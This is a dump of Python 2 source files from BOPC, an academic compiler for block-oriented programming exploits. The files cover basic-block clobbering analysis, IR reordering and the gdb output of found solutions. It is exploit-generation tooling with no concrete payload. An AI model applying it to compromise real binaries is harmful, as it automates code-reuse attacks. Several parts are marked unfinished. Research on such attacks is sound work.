'cond'\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'cond':\n                    # this basic block is already a candidate, so no need for further checks\n                    if rmap[ '__r%d' % stmt['reg'] ] == cand:\n                        acc.append( stmt['uid'] )\n            \n\n            if len(acc) > 0:\n                dbg_prnt(DBG_LVL_4, \"Block 0x%x is accepted for statement(s): %s\" %\n                                      (node.addr, ', '.join(sorted(map(str, acc))) ) )\n                \n                self.__cfg.graph.node[node]['acc'] = acc\n                \n                for a in acc:           \n                    accepted.setdefault(a, []).append(node.addr)\n\n                cnt |= set(acc)\n\n\n\n        # print 'accepted', accepted\n\n\n        # -------------------------------------------------------------------------------\n        # check if there are accepted blocks for all statements\n        # -------------------------------------------------------------------------------\n        if len(cnt) < self.__ir.nreal:\n            #fatal(\"Not enough candidate blocks\")\n            dbg_prnt(DBG_LVL_1, \"There are not enough accepted basic blocks. Much sad :(\")\n            return None, None                       # failure x(\n\n       \n        dbg_prnt(DBG_LVL_1, \"Done.\")\n\n        return accepted, rsvp                       # success!\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # mark_clobbering(): Given a register and a variable mapping, this function identifies the set\n    #       of clobbering basic blocks. 
Note that an accepted block can also be clobbering.\n    #\n    # :Arg rmap: A list of (virtual register, hardware register) mappings\n    # :Arg vmap: A list of (variable, address) mappings\n    # :Ret: TODO!!\n    #       \n    def mark_clobbering( self, rmap, vmap ):\n        dbg_prnt(DBG_LVL_1, \"Searching for clobbering basic blocks...\")\n\n        rmap = dict( map(reversed, rmap) )          # cast them to dictionaries to ease searching\n        vmap = dict( map(reversed, vmap) )          # (reverse mappings)\n\n\n        # clear potential leftovers from previous attempts\n        for node, _ in nx.get_node_attributes(self.__cfg.graph,'clob').items(): \n            del self.__cfg.graph.node[node]['clob']\n\n\n        clobbering = { }\n\n        nnodes  = self.__blk_cnt(self.__avoid)\n        counter = 1\n        \n        # iterate over all abstracted basic blocks\n        # (__blk_iter() might return different results for 'node' and 'block' methods!)\n        for node, abstr in self.__blk_iter(self.__avoid, 'abstract'):\n            # dbg_prnt(DBG_LVL_3, \"Analyzing block at 0x%x (%d/%d)...\" % (addr, counter, nnodes))\n\n            # if node.addr != 0x416A66 and node.addr != 0x404eec:\n            #       continue\n\n            clob = set()                            # set of clobbering statements\n\n            #\n            # Question: Is block B clobbering for statement S?\n            #\n            # Clobbering blocks are dynamic. 
Write more...\n            #\n            try:\n                acc = self.__cfg.graph.node[node]['acc']\n            except KeyError:\n                acc = []\n\n\n            for stmt in self.__ir:\n                #\n                # statements 'call', 'cond', 'jump' and 'return' never have clobbering blocks;\n                # only 'varset', 'regset' and 'regmod' affect the others (like 'call')\n                #\n                \n                # -----------------------------------------------------------------------\n                # Statement 'varset'\n                #\n                # Due to the AWP, all variables are set ahead of time, so any basic block\n                # that modifies any of the reserved memory addresses is a clobbering block\n                # -----------------------------------------------------------------------\n                if stmt['type'] == 'varset':\n                    # print '---------', vmap\n                    # for addr, size in abstr['conwr']:\n                    for addr, ex in abstr['memwr']:\n                        # print addr, ex\n                        if addr.shallow_repr() in vmap and vmap[addr.shallow_repr()] == stmt['name']:\n                            # block is clobbering\n                            print hex(node.addr), 'clob for varset'\n                            clob.add(stmt['uid'])\n                            fatal('I should come back to that')\n                            '''\n                            'memwr': set([\n                                (<SAO <BV64 0x7fffffffffeffb0>>, <SAO <BV64 0x40f5a5>>), \n                                (<SAO <BV64 0x7fffffffffeffd0>>, <SAO <BV64 r12_48109_64>>), \n                                (<SAO <BV64 0x7fffffffffeffc0>>, <SAO <BV64 rbx_48100_64>>), \n                                (<SAO <BV64 0x7fffffffffeffe8>>, <SAO <BV64 r15_48112_64>>), \n                                (<SAO <BV64 0x7fffffffffeffc8>>, <SAO <BV64 0x7ffffffffff01f0>>), \n        
                         (<SAO <BV64 0x7fffffffffeffd8>>, <SAO <BV64 r13_48110_64>>), \n                                (<SAO <BV64 0x7fffffffffeffe0>>, <SAO <BV64 r14_48111_64>>)]), \n\n                            'conwr': set([\n                                (576460752303357888L, 64), \n                                (576460752303357896L, 64), \n                                (576460752303357928L, 64), \n                                (576460752303357904L, 64), \n                                (576460752303357872L, 64), \n                                (576460752303357912L, 64), \n                                (576460752303357920L, 64)])}\n                            '''\n                        # Check rsvp here? (and not during search?) Not sure :\\\n\n                        #\n                        # TODO: use 'size' and check for overlaps (e.g., vmap is X, but addr is X+1)\n                        #\n\n\n                # -----------------------------------------------------------------------\n                # Statement 'regset' or 'regmod'\n                #\n                # registers of 'clob' type are always clobbering\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'regset' or stmt['type'] == 'regmod':\n                    #for reg in [r for r in abstr['regwr'].keys() if 1]:\n                    for reg in abstr['regwr'].keys():\n\n                       # print reg, stmt, acc\n\n                        # if the register is being written and the block is not accepted,\n                        # then it's clobbering\n                        if reg in rmap and rmap[reg] == '__r%d' % stmt['reg'] \\\n                            and stmt['uid'] not in acc:\n                        # rmap[reg] != '__r%d' % stmt['reg']:\n                                clob.add(stmt['uid'])\n\n\n                # -----------------------------------------------------------------------\n         
       # Statement 'memrd'                \n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'memrd':                    \n                    for reg in abstr['regwr'].keys():\n                        if reg in rmap and \\\n                            (rmap[reg] == '__r%d' % stmt['reg'] or \\\n                             rmap[reg] == '__r%d' % stmt['mem']) \\\n                             and stmt['uid'] not in acc:\n                        \n                                clob.add(stmt['uid'])\n\n                \n                # -----------------------------------------------------------------------\n                # Statement 'memwr'\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'memwr':                    \n                    for reg in abstr['regwr'].keys():\n                        if reg in rmap and \\\n                            (rmap[reg] == '__r%d' % stmt['mem'] or \\\n                             rmap[reg] == '__r%d' % stmt['val'])\\\n                             and stmt['uid'] not in acc:                        \n                                clob.add(stmt['uid'])\n\n\n                # -----------------------------------------------------------------------\n                # Statement 'call'\n                #\n                # Check dirty registers (optional)\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'call':\n                    pass\n\n\n                # -----------------------------------------------------------------------\n                # Other statements\n                # -----------------------------------------------------------------------\n                else:\n                    pass\n\n\n            # ---------------------------------------------------------------------------\n  
           # In some cases, we have to relax the \"clobbering\" definition. For instance,\n            # if we set a register twice, or when we modify a register (e.g. __r2 -= 1)\n            # in an SPL payload, the 2nd assignment will be clobbering for the 1st according\n            # to our definition of clobbering blocks. However, we will end up finding no \n            # solution as the 2nd accepted block will always be clobbering for\n            # the first.\n            #\n            # Such SPL statements are clobbering by themselves, so we have to go back over\n            # the list of clobbering blocks and remove them.\n            # ---------------------------------------------------------------------------\n            clob_l = list(clob)\n            \n            for s2 in clob_l:\n                for s1 in acc:\n\n                    if self.__is_clobbering(self.__ir[s1], self.__ir[s2]):    \n                        clob.remove(s2)                \n                        break\n\n\n\n\n            # ---------------------------------------------------------------------------\n            # Check dirty registers. 'dirty': ['rax', 'rcx', 'rdx']\n            #\n            # There will be a single basic block after syscall. Mark it as clobbering for\n            #       all registers in 'dirty' list\n            #\n            # Update: This is not needed at all. 
If registers/memory get modified inside\n            # the lib/sys call then the solution will be discarded by simulation, as these\n            # addresses/registers are marked as immutable, so any violation will\n            # result in discarding the current solution.\n            #\n            # UPDATE 2: It is fixed :) (check immutable registers / simulation modes)\n            # \n            # However, a check here can be used as an optimization, as we can discard\n            # solutions earlier.\n            # ---------------------------------------------------------------------------\n            if len(clob) > 0:\n                dbg_prnt(DBG_LVL_4, \"Block 0x%x (%d/%d) is clobbering for statement(s): %s\" %\n                                     (node.addr,  counter, nnodes, # pretty_list(clob, ', ', dec)))                \n                                                         ', '.join(sorted(map(str, clob)))) )\n                \n                self.__cfg.graph.node[node]['clob'] = clob\n                \n                for c in clob:          \n                    clobbering.setdefault(c, []).append(node.addr)\n\n\n            counter += 1\n\n\n        dbg_prnt(DBG_LVL_1, \"Done.\")\n\n        # print clobbering\n        # print self.rsvp\n        # exit()\n\n        return clobbering\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __get_stmt_regs(): This function gets all registers that are being used in a statement.\n    #\n    # :Arg stmt: The statement to get registers from.\n    # :Ret: A list of all registers (int) that are being used by the statement\n    \n    def __get_stmt_regs( self, stmt ):\n        if   stmt['type'] == 'regset': return [stmt['reg']]\n        elif stmt['type'] == 'regmod': return [stmt['reg']]\n        elif stmt['type'] == 'memrd' : return [stmt['reg'], stmt['mem']]\n        elif stmt['type'] == 'memwr' : return [stmt['mem'], stmt['val']]\n        elif 
stmt['type'] == 'call'  : return [] # stmt['args']\n        elif stmt['type'] == 'cond'  : return [stmt['reg']]\n        else:\n            return []\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __is_clobbering(): Check whether SPL statement s2 is clobbering for SPL statement s1.\n    #\n    # :Arg s1: The first SPL statement\n    # :Arg s2: The second SPL statement\n    # :Ret: If statement s2 is clobbering for statement s1, the function returns True. Otherwise it\n    #       returns False.\n    #       \n    def __is_clobbering( self, s1, s2 ):   \n        # TODO: That's not totally correct for complex SPL payloads, but it works for now\n        #\n        #        if  (s1['type'] == 'regset' or s1['type'] == 'regmod') and \\\n        #            (s2['type'] == 'regset' or s2['type'] == 'regmod'):\n        #                if s1['reg'] == s2['reg']:\n        #                    return True\n        #\n        # TODO: Add statements for memrd/memwr!!! IMPORTANT!!!\n\n        s1_regs = set(self.__get_stmt_regs(s1))\n        s2_regs = set(self.__get_stmt_regs(s2))\n\n\n        if (s1_regs & s2_regs): # and s2['uid'] > s1['uid']:\n            return True\n\n        return False\n\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/optimize.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# optimize.py\n#\n# This module performs several optimizations to the generated IR that aim to increase the chances\n# of finding a trace (for the given IR) on the target CFG.\n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\n\nimport compile  as C\nimport calls\nimport networkx as nx\nimport itertools\nimport struct\nimport copy\n\n\n# -------------------------------------------------------------------------------------------------\n# optimize: This is the main class (derived from \"compile\") that optimizes the generated IR.\n#\nclass optimize( C.compile ):\n    ''' ======================================================================================= '''\n    '''                                   INTERNAL FUNCTIONS                                    '''\n    ''' 
======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __get_stmt_regs(): This function gets all registers that are being used in a statement.\n    #\n    # :Arg stmt: The statement to get registers from.\n    # :Ret: A list of all registers (int) that are being used by the statement\n    \n    def __get_stmt_regs( self, stmt ):\n        if   stmt['type'] == 'varset': return []\n        elif stmt['type'] == 'regset': return [stmt['reg']]\n        elif stmt['type'] == 'regmod': return [stmt['reg']]\n        elif stmt['type'] == 'memrd' : return [stmt['reg'], stmt['mem']]\n        elif stmt['type'] == 'memwr' : return [stmt['mem'], stmt['val']]\n        elif stmt['type'] == 'call'  : return stmt['args']\n        elif stmt['type'] == 'cond'  : return [stmt['reg']]\n        else:\n            return []\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __depends(): This function checks whether statement s2 depends on statement s1. Dependencies\n    #       occur at the registers and they are defined as follows:\n    #           [0]. entry  -> *            (depends on everything)\n    #           [1]. varset -> varset \n    #           [2]. regset -> regset / varset\n    #           [3]. regmod -> regset / memrd\n    #           [4]. memrd  -> regset / regmod\n    #           [5]. memwr  -> regset / regmod / memrd\n    #           [6]. call   -> regset / regmod / memrd\n    #           [7]. cond   -> regset / regmod / memrd\n    #           [8]. *      -> return       (everything depends on it)\n    #\n    # :Arg s1: First statement\n    # :Arg s2: Second statement\n    # :Ret: True if s2 depends on s1. 
False otherwise.\n    #\n    def __depends( self, s1, s2 ):\n        s1_regs = set(self.__get_stmt_regs(s1))\n        s2_regs = set(self.__get_stmt_regs(s2))\n\n\n        # ---------------------------------------------------------------------\n        # Case 0: Check whether s1 is the entry (pseudo)statement (and avoid cycles)\n        if s1['type'] == 'entry' and s2['type'] != 'entry':\n            return True\n\n\n        # ---------------------------------------------------------------------\n        # Case 1: Check whether any of the reference names matches\n        elif s1['type'] == 'varset' and s2['type'] == 'varset':\n            for val in s2['val']:                \n                if isinstance(val, tuple) and val[0] == s1['name']:           \n                    return True                     # yes, it depends\n\n\n        # ---------------------------------------------------------------------\n        # Case 2: Check whether any of the reference names matches\n        elif s1['type'] == 'varset' and s2['type'] == 'regset':\n            if isinstance(s2['val'], tuple):\n                for val in s1['val']:               # value dependency\n                    if isinstance(val, tuple) and val[0] == s2['val'][0]:\n                        return True\n\n                if s1['name'] in s2['val'][0]:      # name dependency\n                    return True\n        \n\n        # ---------------------------------------------------------------------\n        # Case 8: Check whether s2 is the return (pseudo)statement (and avoid cycles)\n        elif s1['type'] != 'return' and s2['type'] == 'return':\n            return True\n\n\n        # ---------------------------------------------------------------------\n        # Other Cases: Check whether the registers match and the s2 assignment happens\n        #       *after* s1 (we can compare UIDs as we're within a group).\n        elif (s1_regs & s2_regs) and s2['uid'] > s1['uid']:\n            return True\n\n\n        # 
---------------------------------------------------------------------\n        # Case 7: These are already handled, as conditional statements are not\n        #       moving. Furthermore, semantic analysis has already taken care\n        #       of it.\n\n     \n        return False                                # statements are independent\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __ooo_intrl(): This is the internal function that performs the actual rearrangement of the\n    #       statements. It first builds the dependence graph for the statements and then it uses\n    #       a modified version of Kahn's topological sorting algorithm to find which statements\n    #       can be executed out of order. These statements are packed in the same list, so each\n    #       IR statement now contains a list of statements.\n    #\n    # :Arg stmt_l: A list of statements to make out of order\n    # :Ret: A new list with out of order statements\n    #\n    def __ooo_intrl( self, stmt_l ):\n        if len(stmt_l) == 0: return []              # base check\n\n        G = nx.DiGraph()                            # create a directed graph\n        for s in stmt_l: G.add_node( s[0] )\n\n        # At this point, the IR has passed the semantic checks so a statement only depends on the\n        # statements above it. 
Therefore we only care about distinct pairs (i,j).\n        for i in range(0, len(stmt_l)):\n            for j in range(0, len(stmt_l)):\n                si = stmt_l[i]\n                sj = stmt_l[j]\n\n                if i == j:                          # a statement can't depend on itself\n                    continue\n\n                # print self.__depends(si[1][0], sj[1][0]), si[1][0], sj[1][0]\n                if self.__depends(si[1][0], sj[1][0]):\n                    G.add_edge( sj[0], si[0])       # if j depends on i, then add an edge\n\n\n        # Now, use a modified version of Kahn's topological sorting algorithm to find out the \n        # out of order statements. At each step we extract all nodes (statements) with no\n        # incoming edges and we bucket them together (these statements can be executed in any \n        # order). Then we remove these nodes (along with their edges) and we repeat, until \n        # graph becomes empty.\n        # \n        # Each statement from the 2nd set depends on some statement from the 1st set and therefore,\n        # it must be executed _after_ all statements from previous set.\n        new_l = []                                  # ooo list\n        \n        dbg_arb(DBG_LVL_3, \"Dependence Graph edges:\", G.edges())\n\n        while len(G) > 0:                           # while there are nodes in the dependence graph\n            tG     = G.copy()                       # get a temporary copy of the graph\n            stmt   = ['@__', []]                    # initialize next statement\n            min_pc = INFINITY                       # min PC (start with a huge value)\n\n\n            # for each node with no incoming edges\n            for n in [n for n in tG.nodes() if tG.in_degree(n) == 0]:\n                G.remove_node(n)                    # remove node \n                                                    # (and all adjacent edges from original graph)\n                # keep track of the minimum pc\n   
             min_pc = int(n[3:]) if int(n[3:]) < min_pc else min_pc\n\n                # append statement to the ooo list\n                stmt[1].append([s[1][0] for s in stmt_l if s[0] == n][0])\n\n            # A jcc will jump to the first instruction of the ooo statements, so we need the min pc\n            stmt[0] = stmt[0] + str(min_pc)         # update pc\n\n            new_l.insert(0, stmt)                   # append list of statements to the new list\n\n        return new_l                                # return that list\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __ooo(): This optimization finds which statements can be executed out of order. By allowing \n    #       two statements to be executed out of order, we make our trace searching algorithm more \n    #       flexible, thus giving it more chances to succeed.\n    #\n    #       However, if we rearrange a label or a jump statement, or if we move a statement to a \n    #       different scope of a label or jump, then we'll destroy the payload's execution flow. \n    #       Therefore, we fix labels and conditional jumps at their positions and we only rearrange\n    #       the statements that are between them (so, we use labels and jumps as _delimiters_; this\n    #       is why we need labels in the IR at this point).\n    #\n    # :Ret: None.\n    #\n    def __ooo( self  ):\n        dbg_prnt(DBG_LVL_2, \"Searching for Out-Of-Order statements...\")\n        jumps     = ['cond', 'jump']\n        oldir     = copy.deepcopy(self.__ir)        # take a backup of the original IR\n        self.__ir = []\n        cstmt_l   = []                              # current statement list\n\n\n        for stmt in oldir:                          # for each statement\n            s = stmt[1][0]                          # get the core statement (no ooo yet)\n\n            if s['type'] == 'label' or s['type'] in jumps:  # we have hit a delimiter. 
Slice.\n\n                # make statements out of order (also put conditional back to IR)\n                self.__ir = self.__ir + self.__ooo_intrl(cstmt_l) + \\\n                            ([stmt] if s['type'] in jumps else [])\n\n                cstmt_l   = []                      # clear current list\n\n            else: cstmt_l.append(stmt)              # append any statement to current list\n\n\n        if cstmt_l:                                 # do not forget the leftovers (if any)\n            self.__ir += self.__ooo_intrl(cstmt_l)\n\n        del oldir                                   # free memory\n\n        dbg_prnt(DBG_LVL_2, \"Done.\")\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __label_remove(): In case that __ooo is not invoked, we should remove the labels from the IR.\n    #\n    # :Ret: None.\n    #\n    def __label_remove( self ):\n        dbg_prnt(DBG_LVL_2, \"Removing labels...\")\n\n        oldir     = copy.deepcopy( self.__ir )      # no ooo => 1 tuple per IR entry\n        self.__ir = []\n\n        for stmt in oldir:                          # for each statement\n            # if we have a LABEL (no ooo yet), don't copy it to the new list\n            if stmt[1][0]['type'] != 'label': self.__ir.append( stmt )\n\n        del oldir                                   # free memory\n\n        dbg_prnt(DBG_LVL_2, \"Done.\")\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __rewrite(): This optimization rewrites some function calls from equivalent groups. 
Thus,\n    #       it increases the likelihood of finding a solution (e.g., when puts() is not available,\n    #       BOPC searches for printf()).\n    #\n    # :Ret: None.\n    #\n    def __rewrite( self ):\n        dbg_prnt(DBG_LVL_2, \"Rewriting library and system calls...\")\n\n        for stmt in self.__ir :                     # for each statement            \n            if stmt[1][0]['type'] == 'call': \n            \n                for group in calls.call_groups__:\n                    name = stmt[1][0]['name']\n\n                    if name in group:\n                        stmt[1][0]['alt'] = [f for f in group if f != name]\n\n        dbg_prnt(DBG_LVL_2, \"Done.\")\n\n        error(\"Rewrite optimization is incomplete\")\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __future(): This function is reserved for future optimizations. \n    #\n    # :Ret: None.\n    #\n    def __future( self ):\n        warn(\"Add future optimizations...\")\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor.\n    #\n    # :Ret: A class object.\n    #\n    def __init__( self, ir ):\n        self.__ir = ir                              # IR to optimize\n\n        super(self.__class__, self).__init__('')    # invoke base class constructor\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __getitem__(): Get i-th statement from IR. 
Out-of-order statements are grouped in the same \n    #       list entry, so we cannot find them in O(1) without an auxiliary data struct. For now,\n    #       we simply perform a linear search.\n    #\n    #       This function overloads compile.__getitem__()\n    #\n    # :Arg idx: Index of the IR statement\n    # :Ret: The requested IR statement\n    # \n    def __getitem__( self, idx ):\n        assert( idx >= 0 )                          # bounds checks\n\n        for _, stmt_r in self.__ir:                 # for each IR statement list\n            for stmt in stmt_r:                     # for each \"parallel\" statement\n                if stmt['uid'] == idx: return stmt  # if index found return statement\n\n        raise IndexError(\"No statement with uid = %d found\" % idx )\n        # return []                                 # failure. Statement not found\n\n\n \n    # ---------------------------------------------------------------------------------------------\n    # optimize(): Optimize the generated IR\n    #\n    # :Arg mode: Mode that the optimizer should operate in\n    # :Ret: None.\n    #\n    def optimize( self, mode ):\n        dbg_prnt(DBG_LVL_1, \"Optimizer started. Mode: '%s'\" % mode)\n\n        try:\n            # Each optimization mode executes some functions. 
Based on the mode, execute the \n            # appropriate sequence of functions.\n            for opt in {\n                'none'    : [self.__label_remove],\n                'ooo'     : [self.__ooo],\n                'rewrite' : [self.__rewrite],\n                'full'    : [self.__ooo, self.__future]\n            }[ mode ]: opt()\n\n        except KeyError: \n            fatal(\"Invalid mode '%s'\" % mode )      # invalid mode\n\n        dbg_prnt(DBG_LVL_1, \"Optimization completed.\")\n\n\n        self._calc_stats()                          # re-calculate statistics\n\n        # At this point we can make the IR immutable, as we won't make any changes to it.\n\n        dbg_prnt(DBG_LVL_2, 'Optimized IR:')\n\n        for pc, group in self.__ir:                 # print optimized IR\n            dbg_prnt(DBG_LVL_2, '%s %s %s' % ('-'*32, pc, '-'*32))\n            \n            for stmt in group:\n                dbg_arb(DBG_LVL_2, '', stmt)\n\n\n \n    # ---------------------------------------------------------------------------------------------\n    # itergroup(): Iterate over all group statements.\n    #\n    # :Ret: Each call returns a different group of statements.\n    # \n    def itergroup( self ):        \n        for _, stmt_r in self.__ir:                 # for each IR statement list\n            yield stmt_r                            # return next statement\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # get_ir(): Return the compiled IR.\n    #\n    # :Ret: The IR.\n    #\n    def get_ir( self ):\n        return self.__ir\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # emit(): Emit the IR and save it into a file\n    #\n    # :Ret: None.\n    #\n    def emit( self, filename ):\n        dbg_prnt(DBG_LVL_1, \"Writing SPL IR to a file...\")    \n         \n        try:    \n            file = open(filename + '.ir', 'w')\n\n   
          for pc, stmt_l in self.__ir:\n                for stmt in stmt_l:\n                    opt  = '%s %s ' % (pc, stmt['type'])\n\n                    # -------------------------------------------------------------------\n                    if stmt['type'] == 'varset':\n                        opt += '%s ' % stmt['name']\n                        \n                        for val in stmt['val']:\n                            if isinstance(val, tuple): \n                                opt += 'var %s ' % val[0]\n                            else:                      \n                                if len(val) != 8:\n                                    for i in range(0, len(val), 8):\n                                        opt += 'num %s ' % val[i:i+8].encode(\"hex\")\n                                        # print val[i:i+8], val[i:i+8].encode(\"hex\")\n                                else:\n                                    opt += 'num %s ' % val.encode(\"hex\")\n                    # -------------------------------------------------------------------\n                    elif stmt['type'] == 'regset':\n                        opt += '%d %s ' % (stmt['reg'], stmt['valty'])\n                        if stmt['valty'] == 'num': opt += '%d' % stmt['val']\n                        else:                      opt += '%s' % stmt['val'][0]\n\n                    # -------------------------------------------------------------------\n                    elif stmt['type'] == 'regmod':\n                        opt += '%d %c %d' % (stmt['reg'], stmt['op'], stmt['val'])\n\n                    # -------------------------------------------------------------------\n                    elif stmt['type'] == 'memrd':\n                        opt += '%d %d' % (stmt['reg'], stmt['mem'])\n\n                    # -------------------------------------------------------------------\n                    elif stmt['type'] == 'memwr':\n                        opt += '%d %d' % (stmt['mem'], 
stmt['val'])\n\n                    # -------------------------------------------------------------------\n                    elif stmt['type'] == 'label':\n                        pass\n\n                    # -------------------------------------------------------------------\n                    elif stmt['type'] == 'call':\n                        # dirty is not used at all\n                        opt += '%s %s' % (stmt['name'], ' '.join('%d' % a for a in stmt['args']))\n\n                    # -------------------------------------------------------------------\n                    elif stmt['type'] == 'cond':\n                        opt += '%d %s %d %s' % (stmt['reg'], stmt['op'], stmt['num'], stmt['target'])\n\n                    # -------------------------------------------------------------------\n                    elif stmt['type'] == 'jump':\n                        opt += '%s' % stmt['target']\n\n                    # -------------------------------------------------------------------\n                    elif stmt['type'] == 'return':\n                        # dirty is not used at all\n                        opt += '%x' % stmt['target']\n\n\n                    file.write( \"%s\\n\" % opt )\n                       \n            file.close()\n           \n            dbg_prnt(DBG_LVL_1, \"Done. SPL IR saved as %s\" % filename + '.ir')\n\n        except IOError, err:\n            fatal(\"Cannot create file: %s\" % str(err))    \n\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/output.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# output.py:\n#\n# This module deals with the representation of the solution.\n#\n#\n# * * * ---===== TODO list =====--- * * *\n#\n# [1]. Support the other formats (right now only 'gdb' is supported). 
To do that, make all \n#      functions dispatchers that invoke internal ones (e.g., register() will use self.__format to\n#      choose between __gdb_register(), __idc_register() or __raw_register()).\n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\nimport datetime\nimport textwrap\nimport time\n\n\n\n# -------------------------------------------------------------------------------------------------\n# output: This class transforms the solution into the appropriate format and dumps it into a file.\n#\nclass output( object ):\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor. 
\n    #\n    # :Arg fmt: The format to use\n    #\n    def __init__( self, fmt ):\n        self.__format = fmt                         # current format\n        self.__output = ''                          # the final output string\n\n\n        # check if format is valid\n        if self.__format not in ['raw', 'gdb', 'idc']:\n            fatal(\"Unknown format '%s'\" % self.__format)\n        \n        if self.__format != 'gdb':\n            fatal(\"Format '%s' is not implemented\" % self.__format)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # comment(): Add a comment to the output file.\n    #\n    # :Arg comment: Comment to add\n    # :Ret: None.\n    # \n    def comment( self, comment ):\n        self.__output += '# %s\\n' % comment\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # newline(): Simply add a blank newline.\n    #\n    # :Ret: None.\n    # \n    def newline( self ):\n        self.__output += '\\n'\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # breakpoint(): Add a breakpoint to the output file.\n    #\n    # :Arg address: Address of the breakpoint\n    # :Ret: None.\n    # \n    def breakpoint( self, address ):\n        self.__output += 'break *0x%x\\n' % address\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # register(): Set a register.\n    #\n    # :Arg register: Register to set\n    # :Arg value: Value to write (8 bytes)\n    # :Ret: None.\n    # \n    def register( self, register, value, comment='' ):        \n        self.__output += 'set $%s = %s' % (register, value)\n\n        if comment: \n            self.__output += '\\t# ' + comment\n\n        self.__output += '\\n'\n\n\n\n    # ---------------------------------------------------------------------------------------------\n   
 # memory(): Write to memory.\n    #\n    # :Arg address: Address to write\n    # :Arg value: Value that is being written\n    # :Arg size: Size of the value\n    # :Ret: None.\n    # \n    def memory( self, address, value, size ):\n        if size == 8 and value[0] != '{':\n            cast = '(long long int)'\n        else:\n            cast = ''\n\n        self.__output += 'set {char[%d]} (%s) = %s %s\\n' % (size, address, cast, value)        \n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # external(): External input (from socket, file, etc.)\n    #\n    # :Arg line: -\n    # :Ret: None.\n    # \n    def external( self, line ):\n        fatal('output.external() is not implemented yet')\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # alloc(): Allocate some contiguous memory (pool).\n    #\n    # :Arg varname: Pool name\n    # :Arg size: Pool size\n    # :Ret: None.\n    # \n    def alloc( self, varname, size ):\n        self.__output += 'set %s = malloc(%d)\\n' % (varname, size)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # set(): Set a variable.\n    #\n    # :Arg name: Variable name\n    # :Arg value: Variable's desired value\n    # :Ret: None.\n    # \n    def set( self, name, value ):\n        self.__output += 'set %s = %s \\n' % (name, value)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # save(): Save the current output to a file.\n    #\n    # :Arg binary: Binary file name\n    # :Ret: None.\n    # \n    def save( self, binary ):\n        now    = datetime.datetime.now()            # get current timestamp\n        banner = textwrap.dedent(\"\"\"\\\n            #\n            # This file has been created by BOPC at: %s\n            # \n        \"\"\" % now.strftime(\"%d/%m/%Y %H:%M\"))       # 
